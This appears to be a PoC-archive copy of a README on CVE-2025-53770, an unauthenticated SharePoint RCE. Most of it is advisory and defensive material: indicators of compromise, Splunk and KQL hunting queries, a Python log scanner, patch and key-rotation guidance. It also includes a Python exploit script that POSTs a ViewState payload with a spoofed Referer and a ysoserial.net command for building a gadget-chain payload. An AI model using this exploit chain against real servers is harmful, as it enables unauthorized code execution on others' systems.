Associated vulnerability
Description
Exploit & research for CVE‑2025‑53770 – a zero‑day remote code execution vulnerability in Microsoft SharePoint (on‑premises).
Introduction
# CVE-2025-53770 - Zero-day exploitation in the wild of Microsoft SharePoint servers
## Overview
In mid‑July 2025, Microsoft disclosed **CVE‑2025‑53770**, a **zero‑day remote code execution** vulnerability in **on‑premises SharePoint**. This flaw, when chained with **CVE‑2025‑53771**, enables **unauthenticated attackers** to fully compromise vulnerable servers over the internet.
The exploitation campaign, dubbed **"ToolShell"**, has been observed **actively targeting governments, energy, education, and telecom sectors worldwide**. If you run **SharePoint Server (2016/2019/Subscription)** and expose it to the internet, you need to **patch now**.
### Impact at a glance
- **Attack Vector:** Remote, unauthenticated
- **Impact:** Full RCE (IIS worker context)
- **Exploitation:** Active (confirmed by MS + CISA)
- **Ease:** Exploitable with a single HTTP POST
---
## Vulnerability Details
The issue lies in **unsafe deserialization** of crafted `__VIEWSTATE` data in the **ToolPane.aspx** component. When combined with a **referer spoof** (CVE‑2025‑53771), attackers can reach this endpoint **without authentication**, feed it a malicious payload, and gain **remote code execution** as the **w3wp.exe** (IIS worker) process.
### The attack chain:
1. **Authentication bypass**: Use `Referer: /_layouts/SignOut.aspx` to bypass security checks on `/_layouts/15/ToolPane.aspx?DisplayMode=Edit`.
2. **Malicious ViewState**: Send a **signed or forged ViewState** payload containing serialized gadget chains (crafted via tools like **ysoserial.net**).
3. **RCE**: SharePoint deserializes the payload and executes attacker‑controlled code.
4. **Persistence**: Attackers drop a web shell (e.g., `spinstall0.aspx`) and steal **machine keys** for future signed payload generation.
### Visualized:
```
[ Attacker ]
|
v
POST /_layouts/15/ToolPane.aspx
Referer: /_layouts/SignOut.aspx
|
v
[ SharePoint Server ]
Deserializes malicious __VIEWSTATE
|
v
[ RCE: Attacker code runs as w3wp.exe ]
```
---
## Why It Matters
- **No authentication required**: Works from the internet if the server is exposed.
- **Full takeover**: Post‑exploitation, attackers can upload shells, pivot laterally, and persist even after patching by abusing stolen machine keys.
- **Exploited in the wild**: Microsoft, CISA, and Rapid7 have confirmed **active exploitation** in multiple regions.
---
## Affected Versions
- **SharePoint Server 2016** (before KB5002760)
- **SharePoint Server 2019** (before KB5002754)
- **SharePoint Subscription Edition** (before KB5002768)
(**SharePoint Online is not affected**.)
---
## Indicators of Compromise
- Requests to:
```
/_layouts/15/ToolPane.aspx?DisplayMode=Edit
```
with `Referer: /_layouts/SignOut.aspx`.
- Dropped files:
```
spinstall0.aspx
spinstall1.aspx
```
- Suspicious process chains:
```
w3wp.exe → cmd.exe → powershell.exe -EncodedCommand
```
- Known attacker IPs:
```
107.191.58.76, 104.238.159.149, 96.9.125.147
```
---
## Detection & Hunting
### Splunk (IIS Logs)
```spl
index=iis sourcetype="ms:iis:auto"
cs_uri_stem="/_layouts/15/ToolPane.aspx"
cs_referer="/_layouts/SignOut.aspx"
| stats count by clientip, cs_user_agent, _time
```
### KQL (Microsoft Sentinel)
```kql
// W3CIISLog exposes the user agent as csUserAgent (not userAgent)
W3CIISLog
| where csUriStem == "/_layouts/15/ToolPane.aspx"
| where csReferer == "/_layouts/SignOut.aspx"
| summarize count() by cIP, csUserAgent, TimeGenerated
```
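The Splunk and KQL queries above match only the exact ToolPane.aspx / SignOut.aspx pair. The following is an added example (not part of the original README) that scans raw IIS W3C log lines offline for every indicator listed in the "Indicators of Compromise" section: the ToolPane.aspx request with a SignOut.aspx referer, requests for the dropped `spinstall*.aspx` files, the published attacker IPs, and oversized POST bodies to ToolPane.aspx. The log lines, the `LARGE_POST_BYTES` threshold and the rule names are constructed for this demo; the referer check uses a suffix match so it fires whether IIS logged the bare path or a full URL.

```python
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple

# Indicators taken from the IoC section of this page (compared case-insensitively)
TOOLPANE_PATH = "/_layouts/15/toolpane.aspx"
SIGNOUT_REFERER = "/_layouts/signout.aspx"
WEBSHELL_NAMES = {"spinstall0.aspx", "spinstall1.aspx"}
KNOWN_BAD_IPS = {"107.191.58.76", "104.238.159.149", "96.9.125.147"}
# Assumed threshold for an "oversized" ToolPane.aspx POST body; the page gives no number
LARGE_POST_BYTES = 4096

# Constructed sample log in IIS W3C extended format (not a real capture)
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) cs(Referer) sc-status cs-bytes
2025-07-19 08:01:12 10.0.0.5 GET /_layouts/15/start.aspx - 10.0.0.40 Mozilla/5.0 - 200 412
2025-07-19 08:02:30 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 107.191.58.76 python-requests/2.32 /_layouts/SignOut.aspx 200 7321
2025-07-19 08:02:35 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 107.191.58.76 python-requests/2.32 - 200 150
2025-07-19 08:05:00 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 192.168.1.20 Mozilla/5.0 https://sp.corp.example/sites/hr/home.aspx 200 900
"""


@dataclass
class Finding:
    rule: str
    client_ip: str
    line_no: int
    detail: str


def parse_w3c(text: str) -> Iterator[Tuple[int, Dict[str, str]]]:
    """Yield (line_no, record) for each entry of a W3C extended IIS log.

    The '#Fields:' directive names the columns; other '#' lines are skipped.
    IIS writes '+' instead of spaces inside a field value, so splitting on
    single spaces is safe.
    """
    fields: List[str] = []
    for n, raw in enumerate(text.splitlines(), start=1):
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw or raw.startswith("#"):
            continue
        values = raw.split(" ")
        if len(values) != len(fields):
            continue  # malformed line; a production scanner would report it
        yield n, dict(zip(fields, values))


def scan(text: str) -> List[Finding]:
    """Apply the IoC rules to every record and return the matches."""
    findings: List[Finding] = []
    for n, rec in parse_w3c(text):
        ip = rec.get("c-ip", "-")
        method = rec.get("cs-method", "-")
        stem = rec.get("cs-uri-stem", "-").lower()
        referer = rec.get("cs(Referer)", "-").lower()
        try:
            req_bytes = int(rec.get("cs-bytes", "0"))
        except ValueError:
            req_bytes = 0

        # Rule 1: the CVE-2025-53771 referer spoof against ToolPane.aspx
        if stem == TOOLPANE_PATH and referer.endswith(SIGNOUT_REFERER):
            findings.append(Finding("toolpane_signout_referer", ip, n,
                                    f"{method} {stem} Referer={referer}"))
        # Rule 2: unusually large POST body to ToolPane.aspx (ViewState gadget chain)
        if stem == TOOLPANE_PATH and method == "POST" and req_bytes > LARGE_POST_BYTES:
            findings.append(Finding("large_toolpane_post", ip, n, f"cs-bytes={req_bytes}"))
        # Rule 3: access to the web shell file names from the IoC list
        if stem.rsplit("/", 1)[-1] in WEBSHELL_NAMES:
            findings.append(Finding("webshell_request", ip, n, stem))
        # Rule 4: client IP on the published attacker list
        if ip in KNOWN_BAD_IPS:
            findings.append(Finding("known_attacker_ip", ip, n, "c-ip matches IoC list"))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per rule, handy for a quick triage view."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan(SAMPLE_IIS_LOG)
    for f in hits:
        print(f"line {f.line_no}: {f.rule} from {f.client_ip} ({f.detail})")
    print(summarize(hits))
```

On the sample log the scanner produces five findings, all attributed to the attacker IP: the spoofed-referer POST trips both the referer and the size rule, and the follow-up request for `spinstall0.aspx` trips the web shell rule. The legitimate edit-mode POST from the internal client on the last line produces nothing, which is the behaviour you want before pointing this at production logs.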
---
## Proof‑of‑Concept (Python)
Below is a **ready‑to‑run PoC**. The only thing you need to change is the **TARGET** variable.
```python
#!/usr/bin/env python3
# CVE-2025-53770 – SharePoint Unauthenticated RCE PoC
# Author: 0xH3G4Z1
# Usage: python3 exploit.py
import requests
import urllib3

urllib3.disable_warnings()

# === CONFIG ===
TARGET = "https://your-sharepoint-server"  # <--- CHANGE THIS ONLY
ENDPOINT = "/_layouts/15/ToolPane.aspx?DisplayMode=Edit"
FULL_URL = TARGET.rstrip("/") + ENDPOINT

# Pre-built harmless ViewState payload (for PoC demonstration)
VIEWSTATE_PAYLOAD = (
    "/wEWBwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3"
    "AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTx"
    "Jm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3Aw"
)

HEADERS = {
    "Referer": "/_layouts/SignOut.aspx",
    "Content-Type": "application/x-www-form-urlencoded",
}

DATA = {
    "__VIEWSTATE": VIEWSTATE_PAYLOAD,
    "__EVENTTARGET": "",
    "__EVENTARGUMENT": "",
}


def exploit():
    print(f"[+] Sending payload to {FULL_URL}")
    try:
        r = requests.post(FULL_URL, headers=HEADERS, data=DATA, verify=False, timeout=10)
        print(f"[+] Response: {r.status_code} ({len(r.content)} bytes)")
        if r.status_code == 200:
            print("[+] If vulnerable, the payload was processed (check your target).")
        elif r.status_code == 403:
            print("[-] Access forbidden (patched or blocked).")
        else:
            print("[-] Exploit may not have succeeded.")
    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    exploit()
```
### Generating a payload:
```bash
ysoserial.exe -p ObjectDataProvider -o base64 -g WindowsIdentity -c "cmd /c calc.exe" > payload.txt
```
Then replace `__VIEWSTATE` with the contents of payload.txt.
---
## Mitigation & Hardening
1. **Patch immediately**:
- [KB5002768](https://support.microsoft.com/help/5002768) (Subscription Edition)
- [KB5002754](https://support.microsoft.com/help/5002754) (2019)
- [KB5002760](https://support.microsoft.com/help/5002760) (2016)
2. **Rotate machine keys** (twice): Update the `machineKey` in `web.config` to invalidate stolen signing keys.
3. **Restrict access** to `/_layouts/15/ToolPane.aspx` to **internal networks only**.
4. **Enable IIS request filtering** to block oversized or suspicious ViewState payloads.
5. **Enable Defender AV + AMSI integration** for real‑time scanning of SharePoint components.
6. **Hunt for compromise**: Review IIS logs for ToolPane.aspx requests with unusual referers or large ViewState data.
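Step 2 is the one most often skipped, so here is an added example (not from the original README and not ASP.NET's real ViewState format) that models why it matters. ASP.NET rejects a `__VIEWSTATE` whose MAC does not verify under the current `machineKey` before it deserializes anything; an attacker who has copied the key can therefore keep producing blobs the server accepts until the key changes. The toy scheme below uses HMAC-SHA256 over an opaque payload with `hmac.compare_digest`, and `rotation_demo()` returns whether a blob signed under the old key is still accepted before and after rotation. All keys and payload bytes are constructed for the demo.

```python
import base64
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def new_validation_key() -> bytes:
    """Generate a fresh random validation key (stands in for a machineKey rotation)."""
    return secrets.token_bytes(64)


def sign_viewstate(payload: bytes, validation_key: bytes) -> str:
    """Toy model of MAC-protected ViewState: payload || HMAC-SHA256(payload), base64-encoded."""
    tag = hmac.new(validation_key, payload, hashlib.sha256).digest()
    return base64.b64encode(payload + tag).decode()


def verify_viewstate(token: str, validation_key: bytes) -> Optional[bytes]:
    """Return the payload only if its MAC verifies under the current key.

    On any failure the caller gets None and must not deserialize: a MAC check
    that runs after deserialization is no protection at all.
    """
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:
        return None
    if len(raw) <= TAG_LEN:
        return None
    payload, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    expected = hmac.new(validation_key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return None
    return payload


def rotation_demo() -> Tuple[bool, bool]:
    """Show the effect of key rotation on a blob minted with a leaked key.

    Returns (accepted_before_rotation, accepted_after_rotation).
    """
    key_v1 = new_validation_key()

    # A blob minted with the key that is currently in web.config verifies fine.
    legit = sign_viewstate(b"<page state>", key_v1)
    assert verify_viewstate(legit, key_v1) == b"<page state>"

    # Suppose key_v1 has been copied off the server. The same key produces a
    # blob the server cannot distinguish from its own, and patching the
    # deserialization bug does not change that.
    leaked_key_blob = sign_viewstate(b"<opaque payload>", key_v1)
    accepted_before = verify_viewstate(leaked_key_blob, key_v1) is not None

    # Rotate the machineKey: anything signed under key_v1 now fails the MAC.
    key_v2 = new_validation_key()
    accepted_after = verify_viewstate(leaked_key_blob, key_v2) is not None
    return accepted_before, accepted_after


def tamper_demo() -> bool:
    """Flipping one payload byte of a valid blob must also fail verification."""
    key = new_validation_key()
    raw = bytearray(base64.b64decode(sign_viewstate(b"<page state>", key)))
    raw[0] ^= 0x01
    return verify_viewstate(base64.b64encode(bytes(raw)).decode(), key) is None


if __name__ == "__main__":
    before, after = rotation_demo()
    print(f"blob signed with leaked key accepted before rotation: {before}")
    print(f"blob signed with leaked key accepted after rotation:  {after}")
    print(f"tampered blob rejected: {tamper_demo()}")
```

The point of the two booleans is the `(True, False)` pair: patching closes the entry point, but only rotation turns previously minted blobs into MAC failures, which is why the README lists both. On a real farm the rotation is done through SharePoint's own tooling (the MSRC guidance linked in the references describes the Central Administration and PowerShell options) rather than by hand-editing `web.config` on each server, and IIS must be restarted afterwards so every worker process picks up the new key.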
---
## Key Takeaways
- CVE‑2025‑53770 is being actively exploited.
- The attack is trivial once discovered (POST + spoofed Referer).
- Patching alone is not enough — **rotate machine keys** to invalidate stolen ViewState signing keys.
- Monitor for **web shells** (`spinstall0.aspx`, etc.) and suspicious ToolPane.aspx requests.
---
**References**:
- [Microsoft MSRC](https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/)
- [Rapid7 Blog](https://www.rapid7.com/blog/post/etr-zero-day-exploitation-of-microsoft-sharepoint-servers-cve-2025-53770/)
- [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
File snapshot
[4.0K] /data/pocs/edf9e93096d72ece374b9f31e00548a0e7ab6a5c
├── [1.6K] poc.py
└── [6.7K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source is unavailable or cannot be reached, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.